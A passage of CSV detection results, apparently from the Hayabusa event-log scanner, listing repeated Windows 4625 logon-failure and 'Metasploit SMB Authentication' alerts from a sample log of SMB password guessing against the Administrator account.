Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GHyXVM0jpaKBiY9N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TZoWEcU6VbEnrLpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LIfEzNQWwvrai4ga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DhImfqWz7SHId9hE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6sekQfneNE5uFtx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iEQ6KkZEHGcSgdA8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qzxJYBbM7ZMaaGOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wO5GFBqSltNfjtQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PdsMzjfP1ZcPju2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LqpKmoCX9slPXie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ouHvw1LXTN3OSFYb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tZIB1QO7hfugceJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4QU2BQ0u5tJsdjG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0P7NKiKCmLvu6L1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4obkK4RfsLZe5gdi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRUDpDLhgop8d1el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LvdsNkFqfFWRePXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wvd8c1jYrEZMcKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AWvECxgkvWdg9Zdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHHPOAYSMSp3BhX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rJicXUMfrx9BOzHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eybrQWvrvwSkNADJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VVMPCaQB0XteDSwC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lbjjLoATZE6KPIQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tips954DRcYeIB2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nLe9aMiMz0akxfWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: csroGB9KZOZkb5sY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Zl4Rc25RsvJ7Y9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5CxqCFOIJBMZCD6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gVPwxpR05F3B5aXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nP317UkK2DhTD5Rd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ir3c7dqXm1LhbfqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1U1QZiJSrEufxF3b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HZnDnDhTPuC9n5A1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72gY1ClzwuisAhKW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nrneLGOZCwPIeQgT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm3gGV2yR4B3yrJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fzeklLG1KCTE5FpP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZPwxCw3EWy9NShk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MalB3OcsOsRaMtS3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XMZMqCYPHO3n4RIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1VUeIuU1rQPISNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: md4ioB8wNiaz2EKB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nM8QaFeqwDfJZ1gc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlR75rMhpLnfQZbC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WF8BcOe4YUDYTXkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FK0Iiao20PyPmtTk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 